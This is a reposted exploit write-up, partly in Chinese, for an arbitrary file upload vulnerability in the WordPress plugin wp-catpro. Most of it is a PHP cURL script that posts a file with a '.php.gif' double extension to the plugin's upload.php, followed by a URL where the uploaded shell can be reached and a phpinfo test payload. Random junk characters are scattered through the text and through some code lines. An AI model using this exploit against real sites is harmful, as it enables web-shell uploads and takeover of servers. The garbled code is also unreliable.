WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
$ G- w% j2 s6 L) U5 L
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
5 ?' ^$ H; H% r" q3 X( b- y####
$ r0 ~0 I! k2 k/ c$ X  }9 s
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
- z. `; S- [, @4 z9 t& e: w# ("jpg", "gif", "png")  // Allowed file extensions
: H7 a7 d- `3 L4 h# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 _) V7 f; P. ?: y) ~# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
  ?, y, Q0 U  O5 h/ U------------------

#=> Exploit
# Q7 j' Y: L% x' C( q2 X* X-----------
<?php
% P" Y$ g2 h! A. k: h$ N
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
- b$ K. _9 d3 J8 j; I8 Scurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
( w9 L9 d4 p% M2 ]" w; ~* F  J$postResult = curl_exec($ch);
0 d. V! x9 [, X! p5 m" o( rcurl_close($ch);
9 _$ ~2 e4 D: d
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
?>